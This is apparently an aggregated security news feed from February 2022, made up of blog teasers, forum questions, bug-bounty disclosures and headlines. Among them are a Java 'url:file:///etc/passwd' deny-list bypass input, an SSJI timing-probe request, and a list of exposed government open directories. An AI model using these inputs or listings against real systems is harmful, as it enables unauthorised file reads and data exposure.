    AlbusSec:- Penetration-List 04 File Inclusion
    Hello Members, I hope that you liked Penetration-List Project, Therefore, I worked hard to complete Penetration-list Project. Firstly, I… Continue reading on Medium »
    My Pentest Log -8-
    Greetings from Caenopolis to all, Continue reading on Medium »
    Jax.Network weekly update
    by Maryna Trifonova, Head of Content at Jax.Network Continue reading on Jax.Network Blog »
    How anyone could have gotten a free pass to attend @IWCON2022
    Recently I attended InfoSec Community (@InfoSecComm) ‘s security conference IWCON2022. Awesome conference and awesome experience attending… Continue reading on Medium »
    NMAP commands
    Basic Scan on a Single IP: Continue reading on Medium »
    Everything you need to know about Bug Bounties
    What are Bug Bounty Programs Continue reading on Medium »
  • Open

    SecWiki News 2022-02-28 Review
    SecWiki Weekly (Issue 417) by ourren; Promoting vulnerability assessment through PoC migration by ourren. For more of the latest articles, visit SecWiki
  • Open

    Bypassing deny-list based protocol validation using the url: prefix
    phithon_xg published an interesting trick on Twitter; it can be genuinely useful during analysis, so I have summarized it briefly and am sharing it here. Bypass protocol check in Java: the URLs with the url: prefix below behave in Java's URL class exactly like http:// and file:// respectively. url:http://127.0.0.1:8080 url:file:///etc/passwd So if protocol validation is deny-list based, this url: prefix becomes a point that can be used to bypass it. // Assume check() is a function that blocks URLs starting with file://, // and suppose inputURL is url:file:///sdcard/blahblah.
  • Open

    Climate Change 2022: Impacts, Adaptation and Vulnerability
    Article URL: https://www.ipcc.ch/report/ar6/wg2/ Comments URL: https://news.ycombinator.com/item?id=30500104 Points: 2 # Comments: 0
  • Open

    Stack-based Buffer Overflow Series (aimed at beginners)
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    WeBank Application Security Team Hiring | Shenzhen
    The WeBank application security team is hiring for application security positions
    Ukraine recruits an "IT Army"; 31 Russian entities become targets
    Ukraine intends to form a volunteer "IT Army" to conduct cyberattacks against Russia.
    FreeBuf Morning Report | Meta blocks Russian state media accounts in Ukraine; Iranian hacker group attacks with new malware
    Ukraine is recruiting a volunteer IT army made up of white-hat hackers to launch attacks against a range of Russian entities.
    The benefits of wildcard SSL certificates and how to buy one
    Because of business needs, many websites have multiple subdomains under the same primary domain. In this situation, applying for an SSL certificate requires care: one must consider both the site's security needs and cost-effectiveness, and the first choice is certainly
    China Everbright Bank Security Department Recruitment Notice
    Hiring for security engineer, security operations, security management and other positions.
    Zhang Qiming, deputy head of the United Front Work Department of the Anhui Provincial Party Committee, leads a research visit to 全息网御's Hefei R&D base
    Recently, Zhang Qiming, deputy head of the Anhui Provincial United Front Work Department, led a research visit to 全息网御's Hefei R&D base, focusing on the company's independently developed core technologies, its industry positioning around data security and its ecosystem partnership application scenarios, and held in-depth exchanges on the future development of technology enterprises. He pointed out
    GPU giant NVIDIA suffers a "devastating" cyberattack; top malware shuts down its botnet infrastructure | February 28 global cybersecurity hotspots
    The modular Windows crimeware platform known as TrickBot officially shut down its infrastructure on Thursday, following reports that it was about to retire after nearly two months of inactivity.
    EU officially publishes the Data Act; Ukraine hit by another DDoS attack; kitchenware giant Meyer attacked and internal data leaked | Cybersecurity Weekly
    On February 23, the European Commission published a proposal called the Data Act, which aims to help small companies catch up with large ones in competition and profit from the non-personal data generated by connected products, from smart appliances to cars.
    PortSwigger File Upload series: detailed notes on File Upload
    I actually heard about file upload vulnerabilities quite early on and solved a few challenges in CTF competitions; let me go through PortSwigger's labs once more.
    Anonymous breaches the internal network of Belarusian Railways
    Anonymous breached Belarusian networks, affecting its railway operations.
    NVIDIA suffers a cyberattack, 1TB of data stolen
    The attack affected the company's developer tools and email systems, and 1TB of data, including employees' online credentials, was stolen.
    Exploitation of unpatched vulnerabilities was the main entry point relied on by ransomware attacks in 2021
    Attacks resulting from exploitation of unpatched software vulnerabilities increased by 33%; this was the entry point ransomware attackers relied on most in 2021, accounting for 44% of ransomware attack causes.
  • Open

    Invicti Security Adds Software Composition Analysis to Its Industry-Leading AppSec Platform
    With headline-grabbing vulnerabilities such as Log4Shell drawing attention to the risks presented by open-source components, organizations increasingly need application security programs that address this risk. READ MORE
    DAST, IAST, SCA: Deeper coverage in a single scan
    With Invicti SCA as part of your application security program, you can track and secure open-source components for deeper coverage in one single scan. READ MORE
  • Open

    File Transfer Filter Bypass: Exe2Hex
    Introduction Exe2hex is a tool developed by g0tmilk which can be found here. The tool transcribes EXE into a series of hexadecimal strings which can The post File Transfer Filter Bypass: Exe2Hex appeared first on Hacking Articles.
    Windows Persistence: Shortcut Modification (T1547)
    Introduction According to MITRE, “Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level The post Windows Persistence: Shortcut Modification (T1547) appeared first on Hacking Articles.
  • Open

    Argo Security Automation with OSS-Fuzz
    Continuous Fuzzing Integration in Argo Continue reading on Argo Project »
  • Open

    How to copy the text in photos?
    Techniques used in open source intelligence Continue reading on Medium »
    I hate Marinas, It’s too Crowded —OSINT Challenge 21 and 22
    While I was reading some Medium blogs, I came across @Sofia Santos’s blogs (this writeup specifically: Walkthrough — Hacktoria… Continue reading on Medium »
    Watch your shadow: how can we tell when a photo was taken from the shadows in it?
    Techniques used in open source intelligence Continue reading on Medium »
    The Current State of the Cyber War Between Russia and Ukraine — An OSINT Analysis
    Go through the following OSINT analysis courtesy of Dancho Danchev on the current state of the cyber war between Russia and Ukraine. Enjoy! Continue reading on Medium »
  • Open

    Large Amount of IPs coming from Europe
    Hi, Little background info first. I'm a beginner Networking & Security student so I'm not that unfamiliar with stuff, I don't have anything hosted other than a VPN, and I'm using a consumer grade router that's not capable of VLANs, and other good stuff. I may be just a little paranoid but I've been noticing a lot of blocked IP requests from Russia in the security log for my router. Almost 50% of what I found in the log for February 27 is from over there. One of the IPs I found had 32 hits, another had just 9. Coming in second is the US, then there's Switzerland, Germany, Lithuania. From just the couple foreign IPs that I looked up using https://www.abuseipdb.com/, all of them were flagged for high confidence of abuse. I don't have anything against those countries but I was wondering, with all that's going on, if I should be more concerned than usual. I'd just like my computer and data to remain in one piece. Not sure if I should be saying anything else about my setup on a public post here but could appreciate some advice. Only tech guy in my family so can't ask anyone else. I'm considering just disabling the VPN so I don't have any more open ports, and using iCloud Private Relay or something else when I'm out. I'm aware of pfSense, and I was considering it, but I just don't want to spend $$$ with inflation, chip shortages, and who knows what else. Anyway thanks in advance. submitted by /u/Expensive-Exit6398 [link] [comments]
    How does cross-browser checking work?
    I am not familiar with technology. But this kinda freaked me out. https://fingerprintjs.com/blog/external-protocol-flooding/ Following the article, I went ahead and did this test, https://schemeflood.com/ I recently installed Fedora on my desktop but it showed all the apps I installed on Windows previously. (it's not a dual boot) Did I mess something up when installing? or is it a vulnerability? submitted by /u/manho1e [link] [comments]
    What are your methods for investigating JA3 & JA3S IOC hits?
    What sites do you use to validate information? Even if the certificate is valid, how are you ensuring it's for the proper site? What if the certificate is self-signed or expired? submitted by /u/pass-the-word [link] [comments]
  • Open

    Qualys Vulnerability Detection Pipeline
    Article URL: https://qualys-secure.force.com/discussions/s/ Comments URL: https://news.ycombinator.com/item?id=30492601 Points: 2 # Comments: 0
  • Open

    Various governments open directories
    https://www.mendoza.gov.ar/wp-content/uploads/ https://www.mrt.tas.gov.au/mrtdoc/ https://hret.gov.ph/admin.hret.gov.ph/ https://tuguegaraocity.gov.ph/public/ https://tuguegaraocity.gov.ph/admin/ (sometimes throws a PHP error for some reason) https://web.yme.gov.gr/data/ https://geoftp.ibge.gov.br/ http://www.pmf.sc.gov.br/arquivos/arquivos/ http://maps.six.nsw.gov.au/csv/ http://globe.six.nsw.gov.au/csv/ https://irs.os.gov.ng/wp-content/uploads/ https://online.agriculture.gov.au/static/department/ http://itaperuna.rj.gov.br/planoDiretorArquivos/ https://www.czj.sh.gov.cn/zss/ http://www.mto.gov.on.ca/documents/ https://tnlandsurvey.tn.gov.in/assets2/correlation/ (/assets2/ returns 403, /assets/ returns phpinfo()) https://info.saude.df.gov.br/wp-content/uploads/ http://www…
    A full Google Drive as an archive related to my time in Psychic Tv in the ‘90s. Music, photos, multimedia. And current projects.
    submitted by /u/inoculatemedia [link] [comments]
    Movies, shows and 'more'
    http://51.77.66.14/ some good NSFW stuff in sarasa folder submitted by /u/LucasImages [link] [comments]
  • Open

    Brian Rea (DeviantOllum Deviant) and Lesley Carhart (Hacks4Pancakes) continue their harassment of me
    Please notice I left these people alone for a long period of time and then they start harassing me. Seriously search for when I've mentioned them here last. The line I crossed with her, I blocked her mostly because she pushed some silly stuff that ended my con.
  • Open

    Attacking IBM MQ — SWIFT to Steal Money$$$
    What is IBM MQ? Continue reading on Medium »
    All about Account Takeover
    Account Takeover Methods Continue reading on InfoSec Write-ups »
    StaFi and Immunefi Partner to Launch A Bug Bounty For rDex Testnet
    Introduction Continue reading on Medium »
    Finding EXIF Geo-location of images
    Let us learn about finding EXIF Geo-Location of images Continue reading on Medium »
    Methods to Bypass two factor Authentication
    There are multiple ways to bypass two factor authentication. Some of these ways are here. Continue reading on Medium »
    BUG BOUNTY CHECK LIST BY C1
    C1h2e1 Continue reading on Medium »
    Easy Windows 0 day UAC Bypass!
    Hey guys! I am harish, I used to find vulnerabilities on the Microsoft bug bounty program and Google VRP! Continue reading on Medium »
  • Open

    We Put A C2 In Your Notetaking App: OffensiveNotion
    A Red Teaming Science Fair Project Continue reading on Medium »
  • Open

    Special 50% Discount for My 100GB "Cybercrime Forum Data Set for 2022" Today! Grab a Copy Today!
    Dear blog readers, Who wants to obtain direct download access to my 100GB "Cybercrime Forum Data Set for 2022" with a 50% discount which I'm offering only today for research data mining and enrichment purposes? Drop me a line at dancho.danchev@hush.com Sample photos of the actual content: Stay tuned!
    Courtesy of Republic of Bulgaria!
    This is me! And this is me! On the run. Awesome! Cool! Awesome! More cool stuff! Even more cool stuff! Including this! Including this! This is cool! Even more cool! - check out the Illegal Restraint section! Awesome! Quote: "The Mentally Ill or Disabled" With few exceptions, material conditions in psychiatric hospitals and social care institutions for children and adults with developmental
    Profiling a Currently Active High-Profile Cybercriminals Portfolio of Ransomware-Themed Extortion Email Addresses - Part Four
    Dear blog readers, Continuing the "Profiling a Currently Active High-Profile Cybercriminals Portfolio of Ransomware-Themed Extortion Email Addresses - Part Three" blog post series, I've decided to share yet another currently active portfolio of ransomware-themed email address accounts currently involved in a variety of campaigns. Sample ransomware-themed personal email address accounts known to
    The Cyber War Between Russia and Ukraine - An OSINT Analysis
    Dear blog readers, I've decided to take a deeper look inside the currently ongoing cyber war between Russia and Ukraine and I've decided to provide actionable intelligence on the online whereabouts and actual campaign infrastructure behind the currently ongoing campaigns which appear to be several crowd-sourced campaigns which I profiled including various other modest engagement "touch points"
  • Open

    SecWiki News 2022-02-27 Review
    Customizing an AWVS Docker image by sinver. For more of the latest articles, visit SecWiki
  • Open

    CSS-based data exfiltration using Sequential Import Chaining
    Today I want to talk about Sequential Import Chaining, a CSS-based attack technique. It has little impact on its own, but it is a way to amplify impact when you can control CSS, so be sure to know it and use it well 😊 Sequential Import Chaining: Sequential Import Chaining is an attack technique proposed by d0nutptr, one of the exploitation methods for increasing impact in CSS Injection or RPO (Relative Path Overwrite). It makes use of CSS Attribute Selectors, the feature that lets you apply styles depending on the value of a DOM object.
  • Open

    Circumventing Deep Packet Inspection with Socat and rot13
    submitted by /u/jrj334 [link] [comments]
    ZDI-CAN-12671: Windows Kernel DoS/Privilege Escalation via a NULL Pointer Deref
    submitted by /u/yuhong [link] [comments]

  • Open

    Intigriti’s February XSS challenge By aszx87410
    February’s XSS challenge is here! On the surface the challenge seems simple but it actually gives light upon two very interesting topics … Continue reading on Medium »
    From zero to hero – XSS
    This article is about what you need to know about Cross-Site-Scripting(AKA. XSS). Continue reading on Medium »
  • Open

    Server-Side Javascript Injection (SSJI)
    🔍 Introduction SSJI (Server Side Javascript Injection) is an attack in which, when the server has its own engine for processing JavaScript or has back-end logic that processes it through a headless browser or similar, an attacker takes control of that processing to execute arbitrary JavaScript on the server side. 🗡 Offensive techniques Detect: Send requests containing JS functions such as eval(), setTimeout(), setInterval() and identify whether the server side processes them. The simplest method is a delay check using setTimeout and setInterval. Request GET /import?unloadcode=setTimeout(a%3d1,%205000) HTTP/1.1 Response HTTP/1.
    Relative Path Overwrite (RPO)
    🔍 Introduction RPO (Relative Path Overwrite) is an attack method that overwrites relative URLs, i.e. URLs based on relative paths, to cause unintended behaviour. It is also called Relative Path Confusion; in this document I will use RPO throughout. Note that RPO as discussed on the web differs somewhat from the Relative Path (e.g. ../../app) and Absolute Path (e.g. /app) used in a filesystem. Path Description Example Absolute URL: a URL that includes the host. Relative URL: a URL that does not include the host <src="/file.
  • Open

    How to geolocate a Twitter video using free OSINT tools
    And how relying on information from the news can set you back. Continue reading on Medium »
    Open Source Intelligence — OSINT
    Open Source Continue reading on Medium »
  • Open

    Fuzzing Network Servers with De-Socketing
    submitted by /u/martinclauss [link] [comments]
    The Ransomware Files podcast: In 2019, 23 cities in Texas were infected with the REvil ransomware in a huge attack. The cities recovered quickly but a MSP, whose ScreenConnect software was exploited, was irreparably damaged. It's a heartbreaking story that reveals the human cost of ransomware.
    submitted by /u/ferrochron1 [link] [comments]
  • Open

    Zulip Cloud security vulnerability with reusable invitation links
    Article URL: https://blog.zulip.com/2022/02/25/zulip-cloud-invitation-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30479430 Points: 81 # Comments: 29
  • Open

    SecWiki News 2022-02-26 Review
    No news has been posted yet today~ For more of the latest articles, visit SecWiki
  • Open

    Give Me Some (macOS) Context…
    This blog post will dive into what I like to call “execution contexts” on macOS and why it is important to understand these different… Continue reading on Medium »
  • Open

    Wget security questions
    Are there any security concerns with using wget? Is there anything I should be aware of to stay relatively safe? submitted by /u/fenriswolf_411 [link] [comments]
    This sub is being mentioned on Ukraine related subs.
    There are talks requesting that videos, images, etc. be archived from r/Ukraine just in case information starts disappearing. Not sure if you guys do that sort of thing, but having seen this sub mentioned I figured I'd bring it up here. submitted by /u/Tripartist1 [link] [comments]
    The official SteamOS repo, including ISOs of internal versions.
    submitted by /u/wertercatt [link] [comments]
  • Open

    Examining a Windows LTSC system
    How much more difficult is it to gather evidence from a Windows operating system that is the LTSC version when compared with a regular Windows system? I know LTSC is supposed to be much more privacy friendly and disables telemetry, so I just thought I would ask out of curiosity. submitted by /u/xnospax [link] [comments]
  • Open

    Kali Linux: Top 5 tools for information gathering
    What is information gathering? Continue reading on Medium »
    My first bug in just 5 minutes
    Hello hacker, today I'm going to tell you how I found my first bug (vulnerability) in just 5 minutes Continue reading on Medium »
    SSRF & LFI In Uploads Feature
    Hello fellow hackers, today I will discuss how I found a Server-Side Request Forgery (SSRF) which lead to a Local File Inclusion (LFI)… Continue reading on Medium »
  • Open

    Alan c2 Framework v6.0: Alan + JavaScript = ♡
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    Bypass Email Verification in Customer Portal
    Mattermost disclosed a bug submitted by odx09: https://hackerone.com/reports/1443211 - Bounty: $150
  • Open

    Android App Pentest
    Just got into Android app pentest. The app has a functionality to purchase courses, so what can be the best way to bypass it? Intercepting it through Burp and trying some manipulation as we do in web apps, or will some reverse engineering stuff work here (which I don't think makes sense)? If anybody has any experience pentesting apps with similar functionalities, your help is appreciated!! submitted by /u/Chirag_Offsec22 [link] [comments]
    Moving Into cyber security!
    Switching careers into security Hey everyone! So fairly new to the IT world, as title says I’m switching careers from being an executive chef for the past 16 years into cyber security. I’m starting a 6 month boot camp soon with GSU and afterwards I’ll get my sec+. I’ve been doing a lot of my own research by reading as much as I can, being active in a lot of different forums and have already put 50+ hours on tryhackme (which has been awesome) and putting a lot of work into my home network! The goal is to try and get into a SOC position or something similar and skip the help desk, I’m hoping some of the leadership, team building and communication skills i learned being a chef can help me land these roles. Is there anything I can be doing in the meantime to further help myself? How does this plan sound? Any advice is super helpful!! submitted by /u/Immediate-Ad-8996 [link] [comments]
    I'm getting POST requests from China, a Ukrainian data center, a TOR exit node, and others to my personal project server, any idea what is going on here?
    TL;DR I'm getting POST requests from China, a Ukrainian data center, a TOR exit node, and others to my personal project server, I want to know more and don't know what to do. For some time now, I've been building a cryptocurrency trading bot, but I've left it aside for some time now, letting it collect data while I do other stuff. It will be there when I get back to it. Now that I am thinking of getting back to it, I decide to check in. So, I SSH into my home server, connect to the screen instance, and realize that I'm getting frequent (~1/min) POST requests from some IPs I don't recognize. Now, the only HTTP requests this app is supposed to make are GET requests to the exchange (Kraken) every 5 minutes, so something strange is going on here. In the console, I see multiple lines that l…
  • Open

    Open-source remote server management toolbox: UltimateShell
    Provides a large number of customizable features for penetration testers, programmers, webmasters, IT administrators and almost any user who needs to handle remote work in a simpler way.
  • Open

    Dancho Danchev's Sample Personal Conference and Event Photos - A Compilation
    Dear blog readers,I've decided to share with everyone a set of personal conference and event photos.Enjoy!
  • Open

    Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot
    An attack in early February targeted an energy organization in Ukraine with OutSteel and SaintBot. The attack is part of a larger campaign. The post Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot appeared first on Unit42.

  • Open

    Russian-manufactured armored vehicle vulnerability in urban combat (1997)
    Article URL: https://man.fas.org/dod-101/sys/land/row/rusav.htm Comments URL: https://news.ycombinator.com/item?id=30473688 Points: 52 # Comments: 49
    OpenVAS – Open Vulnerability Assessment Scanner
    Article URL: https://openvas.org/ Comments URL: https://news.ycombinator.com/item?id=30469493 Points: 1 # Comments: 0
    Termux Apps Vulnerability Disclosures
    Article URL: https://termux.org/general/2022/02/15/termux-apps-vulnerability-disclosures.html Comments URL: https://news.ycombinator.com/item?id=30468679 Points: 2 # Comments: 0
    CISA: Zabbix servers under attack with recently disclosed vulnerability
    Article URL: https://therecord.media/cisa-zabbix-servers-under-attack-with-recently-disclosed-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30466266 Points: 5 # Comments: 0
  • Open

    Bug Bounty: My Work Schedule
    According to the 2020 H1 report: Continue reading on Medium »
    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    Booked your tickets for IWCON2022 yet? Continue reading on InfoSec Write-ups »
    Authentication Bypass in Admin Panel
    This is my second write-up about finding a bug in an admin panel and how I escalated the severity from Low to Critical Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CSRF (CROSS SITE REQUEST FORGERY) LAB SOLUTIONS
    CSRF (Cross-Site Request Forgery) allows an authenticated user to be made to perform unwanted actions on a web page… Continue reading on Medium »
    B̶a̶k̶e̶ Hack your cake!
    “If you can’t bake a cake then hack the entire cake shop” — Vivek Coelho Continue reading on InfoSec Write-ups »
    10 ways to get RCE From LFI
    this illustrates multiple ways to upgrade your LFI to RCE Continue reading on Medium »
    Golden/Silver Ticket Attack | Kerberos | Active Directory |
    In this blog, we are going to talk about golden and silver ticket attacks. Continue reading on Medium »
    A Weird Price Tampering Vulnerability
    Well, Hello Pirates!!!!!!!!!!!!!!!!!!!!!!!!! Long Time No See :D Continue reading on Medium »
    Give me a browser, I’ll give you a Shell
    A restricted browser, that’s all you have… what do you do? Continue reading on Medium »
    Bypassing default visibility for newly-added email in Facebook(Part II - Trusted Contacts)
    After 3 months, I managed to bypass again the default visibility for newly-added email in Facebook. Here is the link to my first write-up… Continue reading on Medium »
  • Open

    Razzlekahn Part 1: Establishing Some Background.
    If you haven’t seen my introduction to this case, please take few minutes and check out Untangling the Razzlekahn Conspiracy: An OSINT… Continue reading on Medium »
    Untangling the Razzlekahn Conspiracy: An OSINT Perspective.
    Six years ago, 200,000 Bitcoin were stolen from the Bitfinex exchange. The coins remained largely untouched until 2017 when some of the… Continue reading on Medium »
    How to Set Up MISP (Malware Information Sharing Platform)
    MISP (Malware Information Sharing Platform) is a free, open source threat intelligence platform that can store, correlate, and share IoCs… Continue reading on Medium »
    Mosint
    What is mosint ? Continue reading on Medium »
  • Open

    How to Decrypt the Files Encrypted by the Hive Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Pentest-tool: Simple and secure web deployment for pentest and redteam with simwigo
    submitted by /u/B1che [link] [comments]
    BGP Security in 2021
    submitted by /u/danyork [link] [comments]
    Catching bugs in VMware: Carbon Black Cloud Workload Appliance and vRealize Operations Manager
    submitted by /u/scopedsecurity [link] [comments]
  • Open

    [AWC-Pune] - User can download files deleted by Admin using shortcuts
    Lark Technologies disclosed a bug submitted by prateek_thakare: https://hackerone.com/reports/1463028 - Bounty: $550
    [Android] Directory traversal leading to disclosure of auth tokens
    Slack disclosed a bug submitted by danielllewellyn: https://hackerone.com/reports/1378889 - Bounty: $3500
    Hackerone open redirect security alert bypass via view report as PDF
    HackerOne disclosed a bug submitted by iamr0000t: https://hackerone.com/reports/1386277 - Bounty: $500
  • Open

    Readteam-tool: Simple and secure web deployment for pentest and redteam with simwigo
    Simwigo is a cross-platform tool, written in Go, that allows you to quickly deploy a secure web service (with a nice and neat display :)). It was created to replace the use of tools such as SimpleHTTPServer and http.server from Python. It implements additional features allowing easy file exchange. It can be used for a pentest or a redteam, as well as for personal use. An API token authentication, a white list system, and the use of TLS (automatic deployment via Let's Encrypt) are integrated and increase the security of the service. Check out the latest release: https://github.com/8iche/simwigo/ submitted by /u/B1che [link] [comments]
  • Open

    [Security Bulletin] Clash For Windows remote code execution vulnerability
    Recently, a remote code execution vulnerability in the open-source proxy tool Clash For Windows was disclosed on GitHub. Reportedly, the exploit details and exploit code are already public on the internet, and it may already be exploited in the wild.
  • Open

    Pentesting suite for Android suggestions
    Hey everyone, I am looking for a pentesting suite/app for Android, something similar to what cSploit and zANTI were back in 2014 - 2016, a quick solution to check for most of the basic vulnerabilities. I am aware of Kali NetHunter but I would like something closer to an app than a whole other operating system. Is anything like this still out there? I have been out of the Android community for the past 6 or so years. submitted by /u/ivaks1 [link] [comments]
    Does anyone think directory traversal/arbitrary file read is a super powerful vuln type?
    Let's just look at all the obvious uses for it: - auth bypassing/authorization bypassing - useful in RCE chains Now let me explain why it's a powerful vuln class. Say you find one on the login page of a website; you now have pre-auth file read and for example could steal cached session cookies of an admin or crack a hash stored somewhere. This lets you escalate from a guest user all the way to super admin. Now let's say they patch this. In a lot of cases you can password spray a random user and find a post-auth file read, and now instead of an auth bypass it's more of an authorization bypass: now you're a normal user but can read admin areas and admin log files that may have juicy stuff. I've run into this scenario many times where they'll patch a pre-auth one but a post-auth one quickly gets found. Definitely one of my favorite vulns out there. submitted by /u/Academic-Discount252 [link] [comments]
    Are there any interesting flaws or attacks against SFUs or selective forwarding units? Would make for a novel bug bounty finding
    Most companies these days are moving towards SFUs from p2p, so it would be interesting to exploit low-level SFU implementations for RCE and maybe exploit the general logic of an SFU for IP disclosures etc. I haven't seen like any research on SFUs. One interesting idea is forcing other clients to connect to you by claiming you're an SFU server; not even sure if that's possible but would be interesting. submitted by /u/Academic-Discount252 [link] [comments]
    Reference for Snort/Suricata Flowbit Group Names
    I'm researching Snort "flowbit" group names (ex: http.dottedquadhost, userlogin, etc.). Yet, I cannot find any references that cover/explain the variety of group names that can be used. Does anyone know where I can find more information on how these group names are defined? submitted by /u/cyberphor [link] [comments]
    Is this worth it?
    I'm reading up on zero trust and keep hearing about it, but I'm still trying to figure out what tools there are out there. I heard Cloudflare acquired Area 1 for zero trust, but has anyone heard of these guys? https://usenucleus.cloud/ submitted by /u/Ztsec [link] [comments]
    Could it be real helpful for defending Ukraine from Russia?
    A few minutes ago, I checked the Twitter of Recorded Future and Greynoiseio. Both of them announced that they would apply full resources and capabilities to support Ukraine in their fight against Russia. Trying to find a sub that can answer this... seems reasonable from someone that knows little about the cyber world, so... Is it really helpful for defending Ukraine against Russia? https://twitter.com/cahlberg/status/1496874932273389569 https://twitter.com/Andrew___Morris/status/1496923545712091139 submitted by /u/Late_Ice_9288 [link] [comments]
    Question for cybersec seniors
    Hi guys, I have to do a report for uni and gotta ask some questions to a senior in cybersec/infosec since I am starting my career and I'm a junior. The requirement is that I "interview" someone and I don't know anyone in real life, I hope it's okay, thank you submitted by /u/Mokushi99 [link] [comments]
    What is the going rate for a zero day these days?
    Curious of what the going rate for a zero day is on the black market; or even the legit market. submitted by /u/me_z [link] [comments]
  • Open

    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    No content preview
  • Open

    Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints
    Introduction Will Schroeder and Lee Christensen wrote a research paper on this technique which can be referred to here. In ESC8 technique mentioned in the research The post Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints appeared first on Hacking Articles.
  • Open

    Invoke-EDRChecker: a powerful host security product detection tool
    This tool performs detailed security checks on running processes, including process metadata, the DLLs loaded into the current process, and each DLL's metadata.
    Exploring data-centric foundational data security capability building
    Based on the data-centric concept, this article reviews and demonstrates functionality around data identification, classification and grading, and baseline protection, in combination with open-source software.
    FreeBuf Morning Report | Serious encryption vulnerability exposed in over 100 million Samsung phones; Ukraine recruits hackers to defend against Russian cyberattacks
    Several Ukrainian government websites went offline on Wednesday due to a large-scale distributed denial-of-service (DDoS) attack.
    CISA adds two Zabbix vulnerabilities to its Known Exploited Vulnerabilities catalog
    The US Cybersecurity and Infrastructure Security Agency (CISA) has added two Zabbix vulnerabilities to its Known Exploited Vulnerabilities catalog.
    FreeBuf enterprise group discussion | Talking about enterprise security budgets in a complex situation
    The Personal Information Protection Law, the Data Security Law, the log4j outbreak: what impact will the security community's frequent moves over the past year have on this year's enterprise security budgets?
    "Cloned" games appear in the Microsoft Store, carrying the malware Electron Bot
    By cloning popular games such as Subway Surfers and Temple Run, Electron Bot has infiltrated the Microsoft Store.
    During the Russia-Ukraine war, the US warns to watch out for "MuddyWater" stirring up trouble
    The US and UK issued a warning that a hacker group already identified as Iranian state-backed is conducting digital attacks and other malicious activities against targets worldwide during the Russia-Ukraine war.
    Microsoft Exchange servers hacked to deploy Cuba ransomware
    The Cuba ransomware is exploiting Microsoft Exchange vulnerabilities to get into corporate networks and encrypt devices.
    A journey of a thousand miles begins with a single step: white hat Jimu's bug-hunting road
    Nearly 4 years on the bug-hunting road, from newbie to MVP.
    Research finds adult content in the metaverse is accessible to minors
    According to a recent BBC investigation, children can access sexual content through the metaverse.
    Poorly protected Microsoft SQL databases are becoming a target for hackers
    Recent data shows hackers are installing Cobalt Strike beacons in vulnerable Microsoft SQL databases to gain a foothold in target networks.
    Breaking! Global hacker groups launch a "cyber war" against Russia
    War makes people cherish hard-won peace all the more: we never cheer for war, but we do not fear it either.
    How to use PHP Malware Finder to detect potentially malicious PHP files on a host
    PHP Malware Finder is a powerful detection tool for host security and PHP security; researchers can easily detect potentially malicious PHP files that may exist on their hosts or servers.
    FreeBuf Weekly | Monzo digital bank users targeted by phishing; Meyer discloses cyberattack affecting employees
    Happy weekend, FreeBufers~ Below is this week's "FreeBuf Weekly", in which we summarize and recommend the week's hot news, quality articles and handy tools, so you don't miss any of this week's highlights! Hot news 1. The White House attributes the Ukraine DDoS attacks to Russia's GRU hackers 2. Monzo digital bank users in the UK targeted by phishing 3. Dozens of OpenSea users' NFTs stolen, losses exceed 1.7 million US dollars 4. Getting rich, defecting, encircled... the Conti ransomware group's surreal 2021 5. This kind of phishing email
    Ukrainian government and financial institutions hit by suspected Russian hacker attacks
    This malware was deployed on hundreds of devices on Ukrainian networks.
  • Open

    SecWiki News 2022-02-25 Review
    SecCrawler: crawler and push program for daily security news by ourren cheatsheet: infosec technical parchment by ourren Code analysis and automated refactoring by ourren Practical guide to enterprise security intelligence by ourren Automated detection tool for cookie consent and GDPR violations by ourren CodeQL meets Shiro550 by ourren TP-Link WR740 router backdoor vulnerability by ourren Parallels Desktop virtual machine escape by ourren Getting started with k8s security by ourren For more of the latest articles, visit SecWiki
  • Open

    CEH Practical Review/Guide — How to prepare and ace your exam in the first attempt
    My journey for CEH practical exam started when I applied for the scholarship sponsored by the EC-Council. The actual exam cost was 550$… Continue reading on Medium »

  • Open

    CVE-2022-23835: A security analysis of Visual Voicemail
    Article URL: https://gitlab.com/kop316/vvm-disclosure Comments URL: https://news.ycombinator.com/item?id=30461939 Points: 2 # Comments: 0
  • Open

    HermeticWiper: What We Know About New Malware Targeting Ukrainian Infrastructure (Thus Far)
    submitted by /u/jat0369 [link] [comments]
    A Detailed Analysis of the LockBit Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Understanding Threat Actor’s by @berkdusunur
    submitted by /u/EyeAccomplished5529 [link] [comments]
    The Bvp47 - a Top-tier Backdoor of US NSA Equation Group
    submitted by /u/eberkut [link] [comments]
    Logic Flaw Leading to RCE in Dynamicweb 9.5.0 - 9.12.7
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Curious
    Out of curiosity, are my chances good to land a junior infosec job, SOC analyst, or a sysadmin position based on my work experience? It's not a lot and I am new to the IT field, but to sum it all up the only work experience I have is when I was a Geek Squad agent at Best Buy, when I worked at a call center, and most recently I got a job as a junior help desk technician. I also have 0 certs by the way and I'm too lazy to send in my actual resume hahaha submitted by /u/Jkarl0880 [link] [comments]
    Doubt on Session Cookies
